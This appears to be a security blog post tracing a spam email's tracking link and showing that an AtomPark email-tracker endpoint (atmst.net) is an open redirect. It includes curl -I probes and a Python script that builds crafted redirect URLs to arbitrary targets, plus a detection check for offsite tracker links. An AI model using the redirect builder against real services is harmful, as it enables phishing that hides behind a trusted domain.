This weekend I received a spam message that wanted to sell me tickets to a comedy show in Louisville, KY. This spam message caught my eye because it made it past Google’s spam filters and I’m planning to go to Derbycon in Louisville next week. I decided to explore the link in the email a bit and see what I could find.
The original link sent in the email was this.
The first thing I noticed was the base64 encoded data in the "j" parameter. I decoded the data and got the following JSON object.
Looking at the "l" key in the JSON object, I decided the special.php page was probably a redirect script, so I opened the link using curl -I to get the headers.
HTTP/1.1 302 Moved Temporarily
Date: Mon, 22 Sep 2014 17:37:27 GMT
Server: Apache mod_fcgid/2.3.10-dev
Sure enough, the special.php page gave me a 302 response and sent me to atmst.net/utr.php. I also noticed that the base64 data in the "j" parameter was passed to this new page but was URL encoded.
I again used curl -I to get the page at atmst.net, assuming it was a redirect script as well.
HTTP/1.1 302 Found
Date: Mon, 22 Sep 2014 17:39:29 GMT
Location: http:// goo.gl/A7XOJH
Expires: Thu, 25 Sep 2014 17:39:29 GMT
Once again I had been redirected, this time to the URL referenced in the "l" key of the base64 encoded JSON object.
After doing a bit of research on atmst.net I found that it is used by AtomPark Software as part of its Atomic Email Tracker product. I'm not sure what all of the keys in the JSON object represent, but based on the integration documentation at hxxp://www.massmailsoftware.com/tracker/integration.htm the "u" key is most likely the MD5 hash of the email address of the user account.
I decided to play around with the parameters a bit and see if all of the parameters were required for the redirect to be successful.
With the exception of the "l" key, I replaced all of the values in the JSON object with the letter "a". For the "l" key I changed the URL to http%3A%2F%2F%20arbitrary.test, so that my JSON object now looked like this.
I then base64 encoded the JSON object and once again used curl -I to see what would happen.
curl -I http://atmst.net/utr64.php?j=eyJ1IjoiYSIsImkiOiJhIi
HTTP/1.1 302 Found
Date: Mon, 22 Sep 2014 17:45:49 GMT
Location: http:// arbitrary.test
Expires: Thu, 25 Sep 2014 17:45:49 GMT
This time I was redirected to the URL I chose without having to provide a valid user id. This shows that the atmst.net server is an open redirect. Further testing showed that only the "l" key was required in the JSON object and that it was not necessary to URL encode the target URL.
So if we base64 encode the following JSON object and pass it as the "j" parameter to atmst.net/utr64.php, we will be redirected to google.com.
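The following Python script is an added example, not code from the original post or from AtomPark, that automates the steps walked through above: it pulls the base64 JSON out of a tracker link's "j" parameter, builds the minimal "l"-only payload that was found to be sufficient, and checks a captured curl -I response to confirm that the Location header lands on the host the tester chose. The sample tracker URL and response text are constructed here to match the shape described in the post (placeholder "a" values, not data from the real spam message), and the helper names are my own. It also includes a simple mail-triage check, flagging tracker links whose "l" target sits on a different host than the tracker itself, which generalizes the observation in the post to any link of this form.

```python
import base64
import json
from urllib.parse import parse_qs, unquote, urlencode, urlparse

TRACKER_ENDPOINT = "http://atmst.net/utr64.php"


def build_redirect_param(target):
    """Base64-encode the minimal payload the post found sufficient: only the 'l' key."""
    return base64.b64encode(json.dumps({"l": target}).encode()).decode()


def build_redirect_url(target):
    """Full tracker URL carrying the 'l'-only payload; urlencode handles + / = in the base64."""
    return TRACKER_ENDPOINT + "?" + urlencode({"j": build_redirect_param(target)})


def decode_tracker_param(url):
    """Return the JSON object hidden in the 'j' query parameter of a tracker link.

    Raises KeyError if there is no 'j' parameter and ValueError if it is not
    base64-wrapped JSON (binascii.Error and JSONDecodeError are ValueErrors).
    """
    raw = parse_qs(urlparse(url).query)["j"][0]
    raw += "=" * (-len(raw) % 4)              # tolerate stripped padding
    payload = json.loads(base64.b64decode(raw, altchars=b"-_"))
    if not isinstance(payload, dict):
        raise ValueError("tracker payload is not a JSON object")
    return payload


def redirect_target(url):
    """The 'l' value with any URL encoding removed (the post saw http%3A%2F%2F... here)."""
    return unquote(decode_tracker_param(url).get("l", ""))


def parse_head_response(raw):
    """Parse 'curl -I' style output into (status_code, {lower-case header: value})."""
    lines = raw.strip().splitlines()
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return status, headers


def is_open_redirect(raw_response, chosen_target):
    """True when a 3xx response sends the client to the host the tester chose."""
    status, headers = parse_head_response(raw_response)
    if not 300 <= status < 400 or "location" not in headers:
        return False
    landed = urlparse(headers["location"]).netloc.lower()
    return landed == urlparse(chosen_target).netloc.lower()


def redirect_offsite(url):
    """Mail-triage check: a tracker link whose 'l' target is on a different host than the link."""
    try:
        target = redirect_target(url)
    except (KeyError, ValueError):
        return False
    if not target:
        return False
    return urlparse(target).netloc.lower() != urlparse(url).netloc.lower()


# Constructed sample tracker link with placeholder 'u' and 'i' values and a
# URL-encoded 'l' value, mirroring the layout described in the post.
SAMPLE_TRACKER_URL = TRACKER_ENDPOINT + "?" + urlencode({
    "j": base64.b64encode(json.dumps(
        {"u": "a", "i": "a", "l": "http%3A%2F%2Fgoo.gl%2FA7XOJH"}).encode()).decode()
})

# Constructed 'curl -I' output in the form the post shows for the 'l'-only probe.
SAMPLE_RESPONSE = """HTTP/1.1 302 Found
Date: Mon, 22 Sep 2014 17:45:49 GMT
Location: http://arbitrary.test
Expires: Thu, 25 Sep 2014 17:45:49 GMT
"""

if __name__ == "__main__":
    print("probe URL:", build_redirect_url("http://arbitrary.test"))
    print("sample link redirects to:", redirect_target(SAMPLE_TRACKER_URL))
    print("open redirect confirmed:", is_open_redirect(SAMPLE_RESPONSE, "http://arbitrary.test"))
    print("sample link flagged offsite:", redirect_offsite(SAMPLE_TRACKER_URL))
```

To reproduce the live test, feed the output of build_redirect_url to curl -I and pass the response text to is_open_redirect; the host comparison is what distinguishes a genuine open redirect from a server that ignores the parameter and sends you somewhere fixed.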
Further research found two other domains run by the same company that are also vulnerable to the open redirect.